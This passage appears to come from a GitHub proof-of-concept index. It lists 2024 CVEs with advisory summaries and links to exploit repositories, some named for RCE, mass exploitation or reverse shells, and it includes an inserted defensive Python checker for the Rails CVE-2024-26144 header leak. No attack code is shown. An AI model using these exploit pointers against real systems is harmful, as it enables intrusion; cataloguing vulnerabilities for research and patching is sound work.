Missing Authorization vulnerability in XLPlugins NextMove Lite. This issue affects NextMove Lite: from n/a through 2.17.0.

- [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092)

### CVE-2024-25153 (2024-03-13)

A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.

- [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153)
- [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153)

### CVE-2024-25169 (2024-02-28)

An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.

- [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0)

### CVE-2024-25170 (2024-02-28)

An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.

- [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0)

### CVE-2024-25175 (2024-03-25)

An issue in Kickdler before v1.107.0 allows attackers to deliver an XSS payload via an HTTP response splitting attack.

- [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175)

### CVE-2024-25202 (2024-02-28)

Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar.

- [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202)

### CVE-2024-25227 (2024-03-15)

SQL Injection vulnerability in ABO.CMS version 5.8 allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter of the admin login page.

- [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227)
- [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227)

### CVE-2024-25270 (2024-09-12)

An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulnerability by manipulating the ID parameter and incrementing the STEP parameter, leading to the exposure of sensitive user data.

- [fbkcs/CVE-2024-25270](https://github.com/fbkcs/CVE-2024-25270)

### CVE-2024-25277
- [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277)

### CVE-2024-25278
- [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278)

### CVE-2024-25279
- [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279)

### CVE-2024-25280
- [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280)

### CVE-2024-25281
- [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281)

### CVE-2024-25291 (2024-02-29)

Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin.

- [EQSTLab/CVE-2024-25291](https://github.com/EQSTLab/CVE-2024-25291)

### CVE-2024-25292 (2024-02-29)

Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.

- [EQSTLab/CVE-2024-25292](https://github.com/EQSTLab/CVE-2024-25292)

### CVE-2024-25293 (2024-03-01)

mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) vulnerability via the href attribute.

- [EQSTLab/CVE-2024-25293](https://github.com/EQSTLab/CVE-2024-25293)

### CVE-2024-25376 (2024-04-11)

An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode.

- [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC)

### CVE-2024-25381 (2024-02-21)

There is a stored XSS vulnerability in Emlog Pro 2.2.8 article publishing, due to quoted content not being filtered.

- [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381)

### CVE-2024-25411
- [paragbagul111/CVE-2024-25411](https://github.com/paragbagul111/CVE-2024-25411)

### CVE-2024-25412
- [paragbagul111/CVE-2024-25412](https://github.com/paragbagul111/CVE-2024-25412)

### CVE-2024-25423 (2024-02-22)

An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file.

- [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423)

### CVE-2024-25466 (2024-02-16)

Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 (fixed in v.9.1.1) allows a local attacker to execute arbitrary code via a crafted script to the Android library component.

- [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466)

### CVE-2024-25503 (2024-04-04)

Cross Site Scripting (XSS) vulnerability in Advanced REST Client v.17.0.9 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script to the edit details parameter of the New Project function.

- [EQSTLab/CVE-2024-25503](https://github.com/EQSTLab/CVE-2024-25503)

### CVE-2024-25600 (2024-06-04)

Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection. This issue affects Bricks Builder: from n/a through 1.9.6.

- [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600)
- [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template)
- [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
- [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE)
- [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT)
- [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE)
- [svchostmm/CVE-2024-25600-mass](https://github.com/svchostmm/CVE-2024-25600-mass)
- [ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
- [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600)
- [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600)
- [KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress](https://github.com/KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress)
- [wh6amiGit/CVE-2024-25600](https://github.com/wh6amiGit/CVE-2024-25600)

### CVE-2024-25641 (2024-05-13)

Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the `import_package()` function defined in the `/lib/import.php` script. The function blindly trusts the filename and file content provided within the XML data, and writes such files into the Cacti base path (or even outside it, since path traversal sequences are not filtered). This can be exploited to write or overwrite arbitrary files on the web server, leading to execution of arbitrary PHP code or other security impacts. Version 1.2.27 contains a patch for this issue.

- [5ma1l/CVE-2024-25641](https://github.com/5ma1l/CVE-2024-25641)
- [thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26](https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26)
- [Safarchand/CVE-2024-25641](https://github.com/Safarchand/CVE-2024-25641)
- [StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26](https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26)

### CVE-2024-25723 (2024-02-27)

ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2.

- [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723)

### CVE-2024-25731 (2024-03-04)

The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi).

- [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc)

### CVE-2024-25733
- [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC)

### CVE-2024-25809
- [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809)

### CVE-2024-25832 (2024-02-28)

F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension.

- [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC)

### CVE-2024-25897 (2024-02-21)

ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.

- [i-100-user/CVE-2024-25897](https://github.com/i-100-user/CVE-2024-25897)

### CVE-2024-26026 (2024-05-08)

An SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

- [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026)
- [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026)

### CVE-2024-26144 (2024-02-27)

Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7.

- [gmo-ierae/CVE-2024-26144-test](https://github.com/gmo-ierae/CVE-2024-26144-test)
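The description above names the exact header combination that makes a blob response dangerous: a `Cache-Control` that permits shared caching plus a `Set-Cookie` carrying the session. The checker below is an added example, not Rails code and not from any of the listed PoC repositories. It parses `Cache-Control` directives, decides whether a shared cache is allowed to keep the response, and flags the CVE-2024-26144 condition. The sample responses are constructed, and the "hardened" one simply marks the response `private`; the page does not say exactly what Rails 7.0.8.1 / 6.1.7.7 changed.

```python
"""Added example, not from Rails or from this PoC list: a checker for the
response-header combination behind CVE-2024-26144, where Active Storage
served blobs with "Cache-Control: public" while also setting the session
cookie, so a shared cache could store and replay another user's Set-Cookie."""
from typing import Dict, List, Optional, Tuple

Header = Tuple[str, str]


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """Split a Cache-Control value into {directive: argument-or-None}."""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') if arg else None
    return directives


def shared_cache_may_store(headers: List[Header]) -> bool:
    """True if a shared (proxy/CDN) cache is allowed to keep this response.

    private and no-store forbid it; public or s-maxage permit it; anything
    else is treated as not explicitly cacheable by a shared cache.
    """
    directives: Dict[str, Optional[str]] = {}
    for name, value in headers:
        if name.lower() == "cache-control":
            directives.update(parse_cache_control(value))
    if "no-store" in directives or "private" in directives:
        return False
    return "public" in directives or "s-maxage" in directives


def set_cookie_names(headers: List[Header]) -> List[str]:
    """Names of cookies the response sets (one Set-Cookie header per cookie)."""
    names = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            names.append(value.split("=", 1)[0].strip())
    return names


def session_leak_risk(headers: List[Header]) -> bool:
    """The CVE-2024-26144 condition: shared-cacheable *and* sets a cookie."""
    return shared_cache_may_store(headers) and bool(set_cookie_names(headers))


# Constructed sample responses (not captured from a real Rails app).
VULNERABLE_RESPONSE: List[Header] = [
    ("Content-Type", "image/png"),
    ("Content-Disposition", 'inline; filename="avatar.png"'),
    ("Cache-Control", "public, max-age=3600"),
    ("Set-Cookie", "_app_session=abc123; path=/; HttpOnly"),
]
HARDENED_RESPONSE: List[Header] = [
    ("Content-Type", "image/png"),
    ("Content-Disposition", 'inline; filename="avatar.png"'),
    ("Cache-Control", "private, max-age=3600"),
    ("Set-Cookie", "_app_session=abc123; path=/; HttpOnly"),
]

if __name__ == "__main__":
    for label, resp in (("vulnerable", VULNERABLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: cookies={set_cookie_names(resp)} leak_risk={session_leak_risk(resp)}")
```

Run it against the headers a proxy actually sees (after any CDN rewriting), not the ones the application thinks it sent; the leak only happens when the cache in front of the app treats the response as shared-cacheable.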

### CVE-2024-26160 (2024-03-12)

Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability

- [0x00Alchemist/CVE-2024-26160](https://github.com/0x00Alchemist/CVE-2024-26160)

### CVE-2024-26218 (2024-04-09)

Windows Kernel Elevation of Privilege Vulnerability

- [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218)

### CVE-2024-26229 (2024-04-09)

Windows CSC Service Elevation of Privilege Vulnerability

- [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229)
- [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit)
- [apkc/CVE-2024-26229-BOF](https://github.com/apkc/CVE-2024-26229-BOF)
- [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229)
- [Cracked5pider/eop24-26229](https://github.com/Cracked5pider/eop24-26229)
- [mqxmm/CVE-2024-26229](https://github.com/mqxmm/CVE-2024-26229)

### CVE-2024-26230 (2024-04-09)

Windows Telephony Server Elevation of Privilege Vulnerability

- [kiwids0220/CVE-2024-26230](https://github.com/kiwids0220/CVE-2024-26230)
- [Wa1nut4/CVE-2024-26230](https://github.com/Wa1nut4/CVE-2024-26230)

### CVE-2024-26304 (2024-05-01)

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

- [Roud-Roud-Agency/CVE-2024-26304-RCE-exploits](https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits)
- [X-Projetion/CVE-2024-26304-RCE-exploit](https://github.com/X-Projetion/CVE-2024-26304-RCE-exploit)

### CVE-2024-26308 (2024-02-19)

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue.

- [crazycatMyopic/cve](https://github.com/crazycatMyopic/cve)

### CVE-2024-26475 (2024-03-14)

An issue in radareorg radare2 v.0.9.7 through v.5.8.6 (fixed in v.5.8.8) allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.

- [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475)

### CVE-2024-26503 (2024-03-14)

Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.

- [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503)

### CVE-2024-26521 (2024-03-12)

HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.

- [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521)

### CVE-2024-26534
- [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534)

### CVE-2024-26535
- [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535)

### CVE-2024-26560
- [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560)

### CVE-2024-26574 (2024-04-08)

Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to WSNativePushService.exe.

- [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574)

### CVE-2024-26581 (2024-02-20)

In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_rbtree: skip end interval element from gc. rbtree lazy gc on insert might collect an end interval element that has been just added in this transaction; skip end interval elements that are not yet active.

- [madfxr/CVE-2024-26581-Checker](https://github.com/madfxr/CVE-2024-26581-Checker)
- [laoqin1234/Linux-Root-CVE-2024-26581-PoC](https://github.com/laoqin1234/Linux-Root-CVE-2024-26581-PoC)

### CVE-2024-26817 (2024-04-13)

In the Linux kernel, the following vulnerability has been resolved: amdkfd: use calloc instead of kzalloc to avoid integer overflow. This uses calloc instead of doing the multiplication which might overflow.

- [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd)

### CVE-2024-27088 (2024-02-26)

es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.

- [200101WhoAmI/CVE-2024-27088](https://github.com/200101WhoAmI/CVE-2024-27088)

### CVE-2024-27130 (2024-05-21)

A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.7.2770 build 20240520 and later; QuTS hero h5.1.7.2770 build 20240520 and later.

- [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130)
- [d0rb/CVE-2024-27130](https://github.com/d0rb/CVE-2024-27130)

### CVE-2024-27173 (2024-06-14)

The Remote Command program allows an attacker to obtain remote code execution by overwriting existing Python files containing executable code. This vulnerability is exploited in combination with other vulnerabilities and is difficult to exploit alone, so the CVSS score for this vulnerability by itself is lower than the score listed as its "Base Score". For details on the related vulnerabilities, contact https://www.toshibatec.com/contacts/products/ . For the affected products, models and versions, see the reference URL.

- [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173)

### CVE-2024-27198 (2024-03-04)

In JetBrains TeamCity before 2023.11.4, an authentication bypass that allowed performing admin actions was possible.

- [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198)
- [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198)
- [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE)
- [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198)
- [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE)
- [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE)
- [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT)
- [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-)
- [Stuub/RCity-CVE-2024-27198](https://github.com/Stuub/RCity-CVE-2024-27198)
- [HPT-Intern-Task-Submission/CVE-2024-27198](https://github.com/HPT-Intern-Task-Submission/CVE-2024-27198)
- [jrbH4CK/CVE-2024-27198](https://github.com/jrbH4CK/CVE-2024-27198)
- [geniuszlyy/CVE-2024-27198](https://github.com/geniuszlyy/CVE-2024-27198)
- [Cythonic1/CVE-2024-27198_POC](https://github.com/Cythonic1/CVE-2024-27198_POC)

### CVE-2024-27282 (-)

An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1.

- [Abo5/CVE-2024-27282](https://github.com/Abo5/CVE-2024-27282)

### CVE-2024-27292 (2024-02-29)

Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.

- [th3gokul/CVE-2024-27292](https://github.com/th3gokul/CVE-2024-27292)

### CVE-2024-27316 (2024-04-04)

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

- [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316)
- [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc)

### CVE-2024-27348 (2024-04-22)

Remote Command Execution (RCE) vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 on Java 8 and Java 11. Users are recommended to upgrade to version 1.3.0 with Java 11 and enable the Auth system, which fixes the issue.

- [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348)
- [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348)
- [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE)

### CVE-2024-27460 (2024-05-10)

A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below.

- [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460)
- [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460)
- [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer)

### CVE-2024-27462
- [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462)

### CVE-2024-27474 (2024-04-10)

Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators.

- [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC)

### CVE-2024-27518 (2024-04-29)

An issue in SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 allows unprivileged attackers to escalate privileges via a restore of a crafted DLL file into the C:\Program Files\SUPERAntiSpyware folder.

- [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518)

### CVE-2024-27564 (2024-03-05)

A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.

- [MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564](https://github.com/MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564)
- [Quantum-Hacker/CVE-2024-27564](https://github.com/Quantum-Hacker/CVE-2024-27564)

### CVE-2024-27619 (2024-03-29)

Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to a buffer overflow. Any user with read/write access to the FTP server can write directly to RAM, causing a buffer overflow if the uploaded file or files are larger than the available RAM. The FTP server allows changing directory to the root, which is one level up from the root of the USB flash directory. During upload, RAM fills up, exhausting system resources (no free memory) and causing the system to crash and reboot.

- [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos)

### CVE-2024-27630 (2024-04-08)

Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.

- [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630)

### CVE-2024-27631 (2024-04-08)

Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php.

- [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631)

### CVE-2024-27632 (2024-04-08)

An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function.

- [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632)

### CVE-2024-27665 (2024-04-09)

Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module.

- [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665)

### CVE-2024-27673
- [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673)

### CVE-2024-27674 (2024-04-03)

Macro Expert through 4.9.4 allows BUILTIN\Users:(OI)(CI)(M) access to the "%PROGRAMFILES(X86)%\GrassSoft\Macro Expert" folder and thus an unprivileged user can escalate to SYSTEM by replacing the MacroService.exe binary.

- [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674)

### CVE-2024-27697
- [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697)

### CVE-2024-27766
- [Ant1sec-ops/CVE-2024-27766](https://github.com/Ant1sec-ops/CVE-2024-27766)

### CVE-2024-27804 (2024-05-13)

The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.

- [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804)

### CVE-2024-27815 (2024-06-10)

An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.

- [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815)

### CVE-2024-27954 (2024-05-17)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the WP Automatic plugin (Automatic) allows Path Traversal and Server Side Request Forgery. This issue affects Automatic: from n/a through 3.92.0.

- [fa-rrel/CVE-2024-27954](https://github.com/fa-rrel/CVE-2024-27954)
- [Quantum-Hacker/CVE-2024-27954](https://github.com/Quantum-Hacker/CVE-2024-27954)

### CVE-2024-27956 (2024-03-21)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection. This issue affects Automatic: from n/a through 3.92.0.

- [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956)
- [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE)
- [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN)
- [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956)
- [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956)
- [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956)
- [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package)
- [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956)
- [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956)
- [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE)
- [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE)
- [ThatNotEasy/CVE-2024-27956](https://github.com/ThatNotEasy/CVE-2024-27956)
- [CERTologists/EXPLOITING-CVE-2024-27956](https://github.com/CERTologists/EXPLOITING-CVE-2024-27956)

### CVE-2024-27971 (2024-05-17)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion. This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10.

- [truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note)

### CVE-2024-27972 (2024-04-03)

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection. This issue affects WP Fusion Lite: from n/a through 3.41.24.

- [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc)

### CVE-2024-27983 (2024-04-09)

An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small number of HTTP/2 packets with a few HTTP/2 frames inside. Some data can be left in nghttp2 memory after a reset when headers with an HTTP/2 CONTINUATION frame are sent to the server and the TCP connection is then abruptly closed by the client; this triggers the Http2Session destructor while header frames are still being processed (and stored in memory), causing a race condition.

- [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2)

### CVE-2024-28000 (2024-08-21)

Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache (litespeed-cache) allows Privilege Escalation. This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.

- [Alucard0x1/CVE-2024-28000](https://github.com/Alucard0x1/CVE-2024-28000)
- [ebrasha/CVE-2024-28000](https://github.com/ebrasha/CVE-2024-28000)
- [arch1m3d/CVE-2024-28000](https://github.com/arch1m3d/CVE-2024-28000)
- [SSSSuperX/CVE-2024-28000](https://github.com/SSSSuperX/CVE-2024-28000)
